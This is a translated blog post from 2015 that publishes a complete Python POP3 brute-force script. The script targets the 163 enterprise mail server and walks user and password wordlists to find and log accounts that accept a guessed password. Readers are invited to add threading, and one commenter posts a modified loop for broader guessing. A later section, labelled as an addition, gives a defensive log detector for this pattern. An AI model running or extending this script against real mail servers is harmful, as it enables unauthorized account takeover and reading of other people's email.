2015-05-25

Enterprise Mailbox Brute-Force Script (Python Version)

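I previously posted a thread:
http://zone.wooyun.org/content/20379
It summarized several tricks for brute-forcing enterprise mailboxes, so here is the actual brute-force script. It uses the 163 enterprise mailbox as an example. It is currently single-threaded, was adapted with minor changes from Google mailbox brute-force code found online, and only supports the POP3 protocol. Readers are welcome to modify it to support multiple protocols and multithreading; I'll be waiting. Here is the code: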

#!/usr/bin/python
#Email Pop3 Brute Forcer 
#http://www.darkc0de.com 
#d3hydr8[at]gmail[dot]com 
#http://www.nxadmin.com 

import threading, time, random, sys, poplib 
from copy import copy 

if len(sys.argv) !=3: 
  print "\n\t   EmailPopBruteForcer v1.0" 
  print "\t   --------------------------------------------------\n" 
  print "\t    Usage: ./qmailpopbrute.py <userlist> <wordlist>\n" 
  sys.exit(1) 
   
server = "pop.qiye.163.com" 
success = [] 

try: 
    users = open(sys.argv[1], "r").readlines() 
except(IOError): 
    print "[-] Error: Check your userlist path\n" 
    sys.exit(1) 
   
try: 
    words = open(sys.argv[2], "r").readlines() 
except(IOError): 
    print "[-] Error: Check your wordlist path\n" 
    sys.exit(1) 
   
try: 
  pop = poplib.POP3(server,110) 
  welcome = pop.getwelcome() 
  print welcome 
  pop.quit() 
except (poplib.error_proto): 
  welcome = "No Response" 
  pass 

def mailbruteforce(listuser,listpwd): 
  if len(listuser) < 1 or len(listpwd) < 1 : 
    print "An error occurred: No user or pass list" 
    return 1 
  for user in listuser: 
    for value in listpwd : 
      user = user.replace("\n","") 
      value = value.replace("\n","") 
       
      try: 
        print "-"*12 
         
        print "[+] User:",user,"Password:",value 
        time.sleep(2) 
        pop = poplib.POP3(server,110) 
        pop.user(user) 
        auth = pop.pass_(value) 
        print auth 
        if auth.split(' ')[0]!= "+OK" : 
          pop.quit() 
          print "unknown error !" 
          continue 
        if pop.stat()[1] is None or pop.stat()[1] < 1 : 
          pop.quit() 
          print "unknown error !" 
          continue 
        #print "\t\t\n\nLogin successful:",user, value 
        #print "\t\tMail:",pop.stat()[0],"emails" 
        #print "\t\tSize:",pop.stat()[1],"bytes\n\n" 
        ret = (user,value,pop.stat()[0],pop.stat()[1]) 
        success.append(ret) 
        #print len(success) 
        pop.quit() 
        break 
      except: 
        #print "An error occurred:", msg 
        pass 



print "\n\t EmailPopBruteForcer v1.0" 
print "\t   --------------------------------------------------\n" 
print "[+] Server:",server 
print "[+] Port: 110"
print "[+] Users Loaded:",len(users) 
print "[+] Words Loaded:",len(words) 
print "[+] Server response:",welcome,"\n" 
mailbruteforce(users,words) 

print "\t[+] have weakpass :\t",len(success) 
if len(success) >=1: 
  for ret in success: 
    print "\n\n[+] Login successful:",ret[0], ret[1] 
    print "\t[+] Mail:",ret[2],"emails" 
    print "\t[+] Size:",ret[3],"bytes\n" 
print "\n[-] Done"

As shown in the figure:

[Figure 1: Enterprise Mailbox Brute-Force Script (Python Version)]

Author: admin
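
From the defender's side, the script above leaves a recognizable trail in the mail server's authentication log: one new POP3 connection per guess, a couple of seconds apart, all from one source address. The following is an added example, not part of the original post, that flags that pattern; the Dovecot-style log format, the thresholds, the year, and every address in the sample are assumptions constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Dovecot-style pop3-login syslog lines (format is an assumption; adjust LINE for your server).
LINE = re.compile(r"^(?P<ts>\w{3} +\d+ [\d:]{8}) \S+ dovecot: pop3-login: "
                  r"(?P<event>Login|Aborted login)(?: \([^)]*\))?: "
                  r"user=<(?P<user>[^>]*)>.*?\brip=(?P<rip>[0-9A-Fa-f.:]+)")

def detect(lines, window=timedelta(minutes=5), max_fail=5, min_prior=3, year=2015):
    """Return (kind, source_ip, detail) alerts for POP3 password guessing."""
    fails = defaultdict(deque)   # source IP -> (time, user) of recent failures
    flagged, alerts = set(), []
    for line in lines:
        m = LINE.search(line)
        if not m:
            continue
        # Syslog timestamps carry no year, so one is supplied by the caller.
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        ip, user, recent = m["rip"], m["user"], fails[m["rip"]]
        while recent and ts - recent[0][0] > window:
            recent.popleft()     # drop failures that fell out of the window
        if m["event"] == "Aborted login":
            recent.append((ts, user))
            if len(recent) >= max_fail and ip not in flagged:
                flagged.add(ip)
                alerts.append(("pop3-bruteforce", ip, sorted({u for _, u in recent})))
        elif sum(u == user for _, u in recent) >= min_prior:
            # A success right after repeated failures: treat the password as guessed.
            alerts.append(("login-after-failures", ip, user))
    return alerts

def _line(clock, event, user, ip):   # builds one constructed sample line
    return (f"May 25 {clock} mx dovecot: pop3-login: {event}: "
            f"user=<{user}>, method=PLAIN, rip={ip}, lip=192.0.2.10")

FAIL = "Aborted login (auth failed, 1 attempts in 2 secs)"
# Constructed sample: one source guessing every 3 s, then a user who mistypes once.
SAMPLE = [_line(f"10:00:{s:02d}", FAIL, "alice@example.com", "203.0.113.7")
          for s in range(0, 15, 3)]
SAMPLE.append(_line("10:00:15", "Login", "alice@example.com", "203.0.113.7"))
SAMPLE.append(_line("10:01:00", FAIL, "bob@example.com", "198.51.100.20"))
SAMPLE.append(_line("10:01:09", "Login", "bob@example.com", "198.51.100.20"))

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```

A `login-after-failures` alert means that account's password should be treated as guessed and reset; the single mistyped login from the second address stays below both thresholds and raises nothing.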

2 comments on "Enterprise Mailbox Brute-Force Script (Python Version)"

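  1. 您好 says:

    How should I change your script to use Burp's third cracking mode?

  2. 您好 says:

    Already solved it, haha. I can't program, so pardon my clumsiness, experts..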

    def mailbruteforce(listuser,listpwd):
      if len(listuser) < 1 or len(listpwd) < 1 :
        print "An error occurred: No user or pass list"
        return 1
      for user in listuser:
        user = user.replace("\n","")
        for value in listpwd :
          value = value.replace("\n","")
